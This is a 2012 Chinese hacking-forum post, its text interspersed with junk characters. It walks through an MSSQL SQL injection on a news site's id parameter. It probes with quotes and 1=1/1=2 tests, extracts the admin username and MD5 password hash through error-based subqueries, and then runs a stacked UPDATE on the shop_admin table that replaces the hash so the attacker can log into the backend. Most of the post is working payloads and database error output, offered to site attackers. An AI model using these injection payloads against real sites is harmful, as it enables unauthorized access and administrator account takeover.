经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。& Z8 O y3 ^! q% Y# m& q2 `6 d
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
$ q2 G) @8 f$ S7 [ n测试如下:- ?3 I3 q' G& ?+ |4 @8 {% Q2 o" H
http://www.tmdsb.com/news.asp?id=121
# g0 z0 ^% w$ R7 E, E. T在地址后输入单引号,显示
+ _2 Y- |4 a% ]4 V3 `7 d) R) WMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’% p1 r( F2 k4 d
字符串 ’’’ 之前有未闭合的引号
/ V4 q I6 K; r! [; g: _! c/news/tmdws.asp,行63
$ B. z) [6 C& u. c6 k+ r7 q% ~说明没有过滤单引号且数据库是MSSQL.
! J( x2 |; l( q( V# d3 {# xand 1=1正常。and 1=2出错。肯定存在注入
: K1 d; }+ k4 Y# r! L( W5 a7 ^' Z5 J接着输入5 n- q5 e0 s. P4 T* C
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin), v5 ]# v$ q3 U R/ y
得到帐号为:admin
- R, e9 ]) U5 x6 r! R1 w, {5 _http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
8 r2 ]$ c( I8 u# }得到密码为:a4716077c2ba075c
3 Z7 d' [6 W+ T3 K) q2 S接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433* B7 u9 T `" N
命令如下 :
' W& t& K3 D) P* @6 D;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–) ~3 E, J) o: q# M, h+ j. R0 k: O
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41